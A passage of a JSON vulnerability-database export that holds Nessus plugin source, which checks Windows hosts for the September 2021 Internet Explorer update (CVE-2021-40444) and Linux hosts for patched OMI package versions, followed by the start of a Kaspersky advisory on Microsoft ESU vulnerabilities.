script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/07/05\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Microsoft Internet Explorer OOB (Sept 2021) (deprecated)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"This plugin is a work-around and is being deprecated due other superceded Microsoft Security patches. See Nessus \nPlugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383\n \");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444\");\n script_set_attribute(attribute:\"solution\", value:\n\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\nexit(0, 'This plugin has been deprecated. Use Nessus Plugin IDs: 153374, 153372, 153373, 153375, 153377, 153381, 153383 ');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:39", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a memory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. (CVE-2021-40444)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (September 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/153374", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153374);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\"CVE-2021-40444\");\n script_xref(name:\"MSKB\", value:\"5005563\");\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005623\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005563\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005623\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Security Updates for Internet Explorer (September 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by a\nmemory corruption error in the scripting engine. An unauthenticated, remote attacker can exploit this to execute\narbitrary commands. (CVE-2021-40444)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005563\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005613\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005623\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5005633\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5005563\n -KB5005606\n -KB5005613\n -KB5005623\n -KB5005633\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-40444\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nvar bulletin = 'MS21-09';\nvar kbs = make_list(\n '5005563',\n '5005606',\n '5005613',\n '5005623',\n '5005633'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nvar os = get_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif ('Windows 8' >< productname && '8.1' >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif ('Vista' >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.3', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.2', sp:0, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:'6.1', sp:1, file:'mshtml.dll', version:'11.0.9600.20120', min_version:'11.0.9600.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563') ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:'6.0', sp:2, file:'mshtml.dll', version:'9.0.8112.21591', min_version:'9.0.8112.16000', dir:'\\\\system32', bulletin:bulletin, kb:'5005563')\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5005563 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == '6.3')\n {\n report += ' - KB5005613 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005613', report);\n }\n else if(os == '6.2')\n {\n report += ' - KB5005623 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005623', report);\n }\n else if(os == '6.1')\n {\n report += ' - KB5005633 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005633', report);\n }\n else if(os == '6.0')\n {\n report += ' - KB5005606 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:bulletin, kb:'5005606', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:52", "description": "The version of Microsoft Open Management Infrastructure (OMI) package installed on the remote host is prior to 1.6.8-1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647) \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-17T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure (OMI) package < 1.6.8-1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2023-02-03T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "OMI_1_6_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/153475", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153475);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-38645\",\n \"CVE-2021-38647\",\n \"CVE-2021-38648\",\n \"CVE-2021-38649\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0433\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0044\");\n\n script_name(english:\"Microsoft Open Management Infrastructure (OMI) package < 1.6.8-1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A package installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Open Management Infrastructure (OMI) package installed on the remote host is prior to\n1.6.8-1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit \n this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647)\n \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can\n exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/microsoft/omi/releases\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to version 1.6.8-1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft OMI Management Interface Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:open_management_infrastructure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\ninclude('debian_package.inc');\ninclude('ubuntu.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar rpm_flag = 0;\n# CentOS Linux\nif (rpm_check(release:'CentOS-7', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'CentOS-8', reference:'omi-1.6.8-1')) rpm_flag++;\n# Red Hat Enterprise Linux\nif (rpm_check(release:'RHEL7', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'RHEL8', reference:'omi-1.6.8-1')) rpm_flag++;\n# Oracle Enterprise Linux\nif (rpm_check(release:'EL7', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'EL8', reference:'omi-1.6.8-1')) rpm_flag++;\n# Amazon Linux\nif (rpm_check(release:'ALA', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'AL2', reference:'omi-1.6.8-1')) rpm_flag++;\n# Fedora Core\nif (rpm_check(release:'FC33', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'FC34', reference:'omi-1.6.8-1')) rpm_flag++;\n# NewStart CGSL\nif (rpm_check(release:'ZTE CGSL MAIN 4.06', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'ZTE CGSL MAIN 5.04', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'ZTE CGSL MAIN 6.02', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'ZTE CGSL CORE 5.04', reference:'omi-1.6.8-1')) rpm_flag++;\n# Scientifix Linux\nif (rpm_check(release:'SL6', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'SL7', reference:'omi-1.6.8-1')) rpm_flag++;\n# OpenSUSE\nif (rpm_check(release:'SUSE15.2', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'SUSE15.3', reference:'omi-1.6.8-1')) rpm_flag++;\n# Virtuozzo\nif (rpm_check(release:'Virtuozzo-6', reference:'omi-1.6.8-1')) rpm_flag++;\nif (rpm_check(release:'Virtuozzo-7', reference:'omi-1.6.8-1')) rpm_flag++;\n\nvar deb_flag = 0;\n# Debian Linux\nif (deb_check(release:'8.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\nif (deb_check(release:'9.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\nif (deb_check(release:'10.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\nif (deb_check(release:'11.0', prefix:'omi', reference:'1.6.8-1')) deb_flag++;\n\nvar ubuntu_flag = 0;\n# Ubuntu Linux\nif (ubuntu_check(osver:'14.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'16.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'18.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'20.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\nif (ubuntu_check(osver:'21.04', pkgname:'omi', pkgver:'1.6.8-1')) ubuntu_flag++;\n\nif (rpm_flag || deb_flag || ubuntu_flag)\n{\n var extra;\n\n if (rpm_flag)\n extra = rpm_report_get();\n else if (deb_flag)\n extra = deb_report_get();\n else if (ubuntu_flag)\n extra = ubuntu_report_get();\n\n security_report_v4(\n port: 0,\n severity: SECURITY_HOLE,\n extra: extra\n );\n exit(0);\n}\nelse\n audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:40", "description": "The version of Azure Open Management Infrastructure installed on the remote host is prior to 1.6.8.1. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647) \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-09-17T00:00:00", "type": "nessus", "title": "Microsoft Open Management Infrastructure < 1.6.8.1 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2023-02-03T00:00:00", "cpe": ["x-cpe:/a:microsoft:open_management_infrastructure"], "id": "AZURE_OPEN_MGMT_INFRA_1_6_8_1.NASL", "href": "https://www.tenable.com/plugins/nessus/153474", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153474);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2021-38645\",\n \"CVE-2021-38647\",\n \"CVE-2021-38648\",\n \"CVE-2021-38649\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0433\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0044\");\n\n script_name(english:\"Microsoft Open Management Infrastructure < 1.6.8.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Azure Open Management Infrastructure server is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Azure Open Management Infrastructure installed on the remote host is prior to 1.6.8.1. It is, therefore,\naffected by multiple vulnerabilities:\n\n - A remote code execution vulnerability exists in the OMI agent. An unauthenticated, remote attacker can exploit \n this to bypass authentication and execute arbitrary commands with root privileges. (CVE-2021-38647)\n \n - Multiple privilege escalation vulnerabilities exists in the OMI agent. An unauthenticated, remote attacker can\n exploit this, to gain privileged access to the system. (CVE-2021-38645, CVE-2021-38648, CVE-2021-38649)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/Microsoft/omi/releases/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Azure Open Management Infrastructure version 1.6.8.1 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-38647\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft OMI Management Interface Authentication Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:microsoft:open_management_infrastructure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"microsoft_omi_nix_installed.nbin\");\n script_require_keys(\"installed_sw/omi\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nvcf::add_separator('-'); # used in parsing version for vcf\napp_info = vcf::combined_get_app_info(app:'omi');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'fixed_version' : '1.6.8.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "kaspersky": [{"lastseen": "2023-05-27T14:56:59", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to obtain sensitive information, gain privileges, cause denial of service, spoof user interface, execute arbitrary code.\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-38635](<https://nvd.nist.gov/vuln/detail/CVE-2021-38635>) \n[CVE-2021-36962](<https://nvd.nist.gov/vuln/detail/CVE-2021-36962>) \n[CVE-2021-38628](<https://nvd.nist.gov/vuln/detail/CVE-2021-38628>) \n[CVE-2021-36961](<https://nvd.nist.gov/vuln/detail/CVE-2021-36961>) \n[CVE-2021-38671](<https://nvd.nist.gov/vuln/detail/CVE-2021-38671>) \n[CVE-2021-26435](<https://nvd.nist.gov/vuln/detail/CVE-2021-26435>) \n[CVE-2021-38630](<https://nvd.nist.gov/vuln/detail/CVE-2021-38630>) \n[CVE-2021-36969](<https://nvd.nist.gov/vuln/detail/CVE-2021-36969>) \n[CVE-2021-36955](<https://nvd.nist.gov/vuln/detail/CVE-2021-36955>) \n[CVE-2021-38638](<https://nvd.nist.gov/vuln/detail/CVE-2021-38638>) \n[CVE-2021-36964](<https://nvd.nist.gov/vuln/detail/CVE-2021-36964>) \n[CVE-2021-38629](<https://nvd.nist.gov/vuln/detail/CVE-2021-38629>) \n[CVE-2021-40447](<https://nvd.nist.gov/vuln/detail/CVE-2021-40447>) \n[CVE-2021-38639](<https://nvd.nist.gov/vuln/detail/CVE-2021-38639>) \n[CVE-2021-36959](<https://nvd.nist.gov/vuln/detail/CVE-2021-36959>) \n[CVE-2021-38667](<https://nvd.nist.gov/vuln/detail/CVE-2021-38667>) \n[CVE-2021-38626](<https://nvd.nist.gov/vuln/detail/CVE-2021-38626>) \n[CVE-2021-38636](<https://nvd.nist.gov/vuln/detail/CVE-2021-38636>) \n[CVE-2021-36960](<https://nvd.nist.gov/vuln/detail/CVE-2021-36960>) \n[CVE-2021-36965](<https://nvd.nist.gov/vuln/detail/CVE-2021-36965>) \n[CVE-2021-36968](<https://nvd.nist.gov/vuln/detail/CVE-2021-36968>) \n[CVE-2021-36963](<https://nvd.nist.gov/vuln/detail/CVE-2021-36963>) \n[CVE-2021-38625](<https://nvd.nist.gov/vuln/detail/CVE-2021-38625>) \n[CVE-2021-38633](<https://nvd.nist.gov/vuln/detail/CVE-2021-38633>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005633](<http://support.microsoft.com/kb/5005633>) \n[5005606](<http://support.microsoft.com/kb/5005606>) \n[5005615](<http://support.microsoft.com/kb/5005615>) \n[5005618](<http://support.microsoft.com/kb/5005618>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12289 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", 